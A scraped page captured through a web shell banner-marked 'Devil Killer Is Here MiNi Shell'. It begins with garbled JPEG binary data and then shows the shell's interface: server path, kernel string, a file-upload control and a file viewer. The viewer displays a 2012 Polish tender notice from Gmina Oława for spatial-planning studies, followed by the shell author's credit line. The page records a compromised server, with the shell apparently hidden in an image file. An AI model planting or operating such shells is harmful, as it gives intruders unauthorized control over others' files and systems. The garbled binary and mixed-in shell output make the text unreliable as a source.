JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120510/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120510/149398-N-2012.html

<p class="kh_header"><b>Oława: Opracowanie projektu zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego oraz projektów miejscowego planu zagospodarowania przestrzennego Gminy Oława w granicach terenu objętego Uchwałami Rady Gminy Oława</b><br>
<b>Numer ogłoszenia: 149398 - 2012; data zamieszczenia: 10.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Oława , pl. Marsz. Józefa Piłsudskiego 28, 55-200 Oława, woj. dolnośląskie, tel. 71 3133044, faks 71 3130199.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.gminaolawa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie projektu zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego oraz projektów miejscowego planu zagospodarowania przestrzennego Gminy Oława w granicach terenu objętego Uchwałami Rady Gminy Oława.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest:
1) opracowanie projektu zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego Gminy Oława, zgodnie z  następującymi Uchwałami Rady Gminy Oława:
a) Nr VIII/22/2011 z dnia 25.02.2011 r., obejmuje dz. Nr 250, w obrębie wsi Sobocisko w gm. Oława - zmiana dla zabudowy mieszkaniowej jednorodzinnej;
b) Nr IX/30/2011 z dnia 29.03.2011 r., obejmuje teren dz. Nr 1425/2 i 1424 w obrębie wsi Bystrzyca w gm. Oława;
c) Nr X/39/2011 z dnia 14.04.2011 r., obejmuje teren dz. Nr 257/11, 257/12, 257/10, w obrębie wsi Marcinkowice w gm. Oława oraz teren dz. Nr 86/2, 87/1, 88/4, 88/6, w obrębie wsi Oleśnica Mała w gm. Oława - zmiana dla zabudowy mieszkaniowej jednorodzinnej i usług;
d) Nr XII/57/2011 z dnia 31.05.2011 r., obejmuje teren dz. Nr 72 w obrębie wsi Jankowice Małe w gm. Oława - zmiana dla budowy boiska sportowego;
e) Nr XIV/65/2011 z dnia 30.06.2011 r., obejmuje teren dz. Nr 23/1 w obrębie wsi Stanowice w gm. Oława - zmiana dla zabudowy mieszkaniowej i usług;
f) Nr XVI/78/2011 z dnia 31.08.2011 r., obejmuje teren obrębu wsi Siedlce i Zakrzów w gm. Oława;
g) Nr XVI/81/2011 z dnia 31.08.2011 r., obejmuje teren elektrowni wiatrowej - zmiana dla wysokości wież elektrowni z 145 m na 210 m;
h) Nr XVI/82/2011 z dnia 31.08.2011 r., obejmuje teren dz. Nr 18/1 w obrębie wsi Jaczkowice w gm. Oława - zmiana dla zabudowy mieszkaniowej jednorodzinnej;
i) Nr XVI/84/2011 z dnia 31.08.2011 r., obejmuje teren dz. Nr 822/3 w obrębie wsi Godzikowice w gm. Oława - zmiana dla zabudowy mieszkaniowej jednorodzinnej;
j) Nr XVI/86/2011 z dnia 31.08.2011 r., obejmuje teren dz. Nr 343/1 w obrębie wsi Bystrzyca w gm. Oława - zmiana dla rekreacji;
k) Nr XVII/93/2011 z dnia 28.09.2011 r.; obejmuje teren w obrębie wsi Psary - zmiana dla budowy elektrowni wiatrowej;
l) Nr XIX/112/2011 z dnia 10.11.2011 r., obejmuje teren dz. Nr 159/2 w obrębie wsi Owczary w gm. Oława - zmiana dla zabudowy mieszkaniowej jednorodzinnej.
2) opracowanie projektów miejscowego planu zagospodarowania przestrzennego Gminy Oława w granicach terenu objętego następującymi Uchwałami Rady Gminy Oława:
a) Nr LVII/364/2010 z dnia 29.06.2010 r., obejmuje teren wsi Chwalibożyce, Jankowice Małe, Niemil, Oleśnica Mała, Osiek, Owczary - dla budowy elektrowni wiatrowej;
b) Nr LIX/371/2010 z dnia 31.08.2010 r., obejmuje dz. Nr 84 w obrębie wsi Marszowice w gm. Oława;
c) Nr VIII/22/2011 z dnia 25.02.2011 r., obejmuje dz. Nr 250, w obrębie wsi Sobocisko w gm. Oława - zmiana dla zabudowy mieszkaniowej jednorodzinnej;
d) Nr IX/31/2011 z dnia 29.03.2011 r., obejmuje teren dz. Nr 1425/2 i 1424, w obrębie wsi Bystrzyca w gm. Oława - budowa boiska sportowego;
e) Nr XI/53/2011 z dnia 29.04.2011 r., obejmuje teren dz. Nr 87/1, 88/5, 88/4, w obrębie wsi Oleśnica Mała w gm. Oława;
f) Nr XI/54/2011 z dnia 29.04.2011 r., obejmuje teren dz. Nr 257/11, 257/12, 257/10 w obrębie wsi Marcinkowice w gm. Oława - dla zabudowy M/U;
g) Nr XIV/66/2011 z dnia 30.06.2011 r., obejmuje teren dz. Nr 23/1 w obrębie wsi Stanowice w gm. Oława - zmiana dla zabudowy mieszkaniowej i usług;
h) Nr XVI/83/2011 z dnia 31.08.2011 r., obejmuje teren dz. Nr 18/1 w obrębie wsi Jaczkowice w gm. Oława - dla zabudowy mieszkaniowej jednorodzinnej;
i) Nr XVI/85/2011 z dnia 31.08.2011 r., obejmuje teren dz. Nr 822/3 w obrębie wsi Godzikowice w gm. Oława - dla zabudowy mieszkaniowej jednorodzinnej;
j) Nr XVI/87/2011 z dnia 31.08.2011 r., obejmuje teren dz. Nr 342/3, 343/1 w obrębie wsi Bystrzyca w gm. Oława - zmiana dla rekreacji;
k) Nr XVI/79/2011 z dnia 31.08.2011 r., obejmuje teren obrębu wsi Siedlce w gm. Oława;
l) Nr XVI/80/2011 z dnia 31.08.2011 r., obejmuje tere obrębu wsi Zakrzów w gm. Oława;
m) Nr XVII/93/2011 z dnia 28.09.2011 r., obejmuje teren w obrębie wsi Psary - dla budowy elektrowni wiatrowej;
n) Nr XIX/112/2011 z dnia 10.11.2011 r., obejmuje teren dz. Nr 159/2 w obrębie wsi Owczary w gm. Oława - zmiana dla zabudowy mieszkaniowej jednorodzinnej.
Powyższe uchwały zamieszczone są na stronie Biuletynu Informacji Publicznej Urzędu Gminy Oława: www.bip.gminaolawa.pl.
1.2. Przedmiot zamówienia obejmuje także:
1) Uczestnictwo w czynnościach proceduralnych: udzielanie informacji zainteresowanym w trakcie wyłożenia projektu, uczestniczenie w posiedzeniu Gminnej Komisji Urbanistyczno-Architektonicznej, uczestniczenie w publicznych dyskusjach, udział w sesjach Rady Gminy Oława oraz w innych spotkaniach, których konieczność wyniknie w trakcie procedury. Udziału przedstawiciela Wykonawcy (projektanta) w wyznaczonych przez Zamawiającego co najmniej 3 dyżurach planistycznych. W czasie tych dyżurów będzie on uczestniczył bezpośrednio w rozmowach z zainteresowanymi, udzielał informacji i wyjaśnień na temat wyłożonego projektu zmiany studium i zmiany planu.
2) Pozyskanie niezbędnych map geodezyjnych ze Starostwa Powiatowego w Oławie w formie elektronicznej lub papierowej;
3) Opracowanie zestawień wpływających uwag wniesionych w czasie wyłożenia projektu zmiany studium i projektu zmiany planu do publicznego wglądu. Przygotowania rozstrzygnięć do wniesionych uwag.
4) Prezentację projektu zmiany studium i zmiany planu na posiedzeniach Komisji i sesjach Rady Gminy Oława w sprawie uchwalenia zmiany studium oraz zmiany planu.
5) Usunięcie błędów lub braków w dokumentach związanych z realizacją przedmiotu zamówienia. Usunięcie błędów lub braków w dokumentacji planistycznej ujawnionych na etapie uchwalania oraz weryfikacji zmiany studium i zmiany planu ze szczególnym uwzględnieniem rozstrzygnięć organów nadzorczych.
6) Przygotowanie dokumentów do przeprowadzenia strategicznej oceny oddziaływania na środowisko oraz sporządzenie prognozy oddziaływania na Środowisko zgodnie z art. 46 i art. 51 ustawy z dnia 3 października 2008 r. o udostępnieniu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko ( Dz. U. Nr 199, poz. 1227 z póz. zm.). 
7) Sporządzenie prognozy skutków finansowych uchwalenia zmiany miejscowego planu, uwzględniającej wymagania określone w rozporządzeniu Ministra Infrastruktury z dnia 26 sierpnia 2003 r. w sprawie wymaganego projektu miejscowego planu zagospodarowania przestrzennego.
8) Przygotowanie dokumentacji prac planistycznych do ich oceny pod względem zgodności z przepisami prawnymi przez Wojewodę.
9) Wykonanie czynności niezbędnych do ewentualnego doprowadzenia zmiany studium i planu do zgodności z przepisami prawnymi, w sytuacji stwierdzenia nieważności uchwały zmiany studium i planu.
10) Zaopiniowanie i uzgodnienie projektu zmiany studium i projektu zmiany planu z właściwymi organami.
1.3. Zamawiający wymaga przedłożenia przez Wykonawcę opracowanego przedmiotu zamówienia w następujących ilościach: 
a) 5 egzemplarzy rysunku studium w skali 1-10000 w tym 4 egzemplarze poskładane (w tym 2 egz. w technice barwnej) i 1 egz. w sekcjach w technice barwnej;
b) 1 egz. rysunku studium, foliowany dla celów prezentacji, pomniejszony do skali 1-25000;
c) tekst studium - 5 egz., 
d) studium w formie zapisu elektronicznego - 2 płyty CD, DVD (część tekstowa i graficzna w wersji wektorowej oraz rastrowej), 
e) plany w formie zapisu elektronicznego - 2 płyty CD, DVD (część tekstowa i graficzna w wersji wektorowej oraz rastrowej),
f) rysunki planu w skali: 1-1000, 5 egz. w tym dwa w technice barwnej;
g) opracowanie ekofizjograficzne dla zmiany studium oraz zmiany planu miejscowego - szt. 2;
h) prognoza oddziaływania na środowisko osobno dla zmiany studium oraz zmiany planu  - szt.2.;
i) prognoza skutków finansowych dla zmiany planu miejscowego - szt. 2.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających w zakresie opracowania zmiany studium oraz zmiany miejscowego planu zagospodarowania, do wartości określonej w art. 67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.40.00.00-2, 71.40.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonali w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie: 
1) co najmniej jedną usługę polegającą na opracowaniu (lub zmianie) studium uwarunkowań i kierunków zagospodarowania przestrzennego dla gminy;  
oraz 
2) usługi polegające na opracowaniu lub zmianie miejscowych planów zagospodarowania przestrzennego o łącznej powierzchni minimum 50 ha, lub jedną usługę polegającą na opracowaniu miejscowego planu zagospodarowania przestrzennego gminy lub jego zmiany o powierzchni minimum 50 ha.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponowanie co najmniej dwiema osobami posiadającymi uprawnienia urbanistyczne, o których mowa w ustawie z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. z 2001 r. Nr 5, poz. 42 ze zmianami).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy, sporządzony na podstawie wzoru stanowiącego załącznik nr 1 do  SIWZ.
2. W przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru - Pełnomocnictwo.
3. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego.
4. Jeżeli w miejscu zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o którym mowa w punkcie III.4.3.1. niniejszego ogłoszenia, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Termin wykonania przedmiotu umowy (w tym poszczególnych etapów) ulec może zmianie jedynie w przypadku: 
1) opóźnienia spowodowanego działaniem lub zaniechaniem organów i jednostek gminy oraz osób trzecich, w tym organów władzy publicznej, których udział jest przewidziany  w procedurze sporządzania miejscowych planów zagospodarowania przestrzennego,
2) ponownego wyłożenia planu zagospodarowania przestrzennego;
3) przesunięcia terminu uzgodnień;
4) innych sytuacji  nie wynikających z winy wykonawcy bądź urbanisty.
2. Czas przewidziany na realizację przedmiotu umowy ulega przedłużeniu o czas pozyskiwania materiałów wejściowych przez Wykonawcę w przypadku zlecenia przez Zamawiającego Wykonawcy pozyskania takich materiałów, jak również o czas opóźnienia się przez Zamawiającego z zapłatą za poszczególne etapy prac.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.gminaolawa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Oława, pl. M. J. Piłsudskiego 28, 55-200 Oława, pok. nr 21.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.05.2012 godzina 10:00, miejsce: Urząd Gminy Oława, pl. M. J. Piłsudskiego 28, 55-200 Oława, pok. nr 8 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com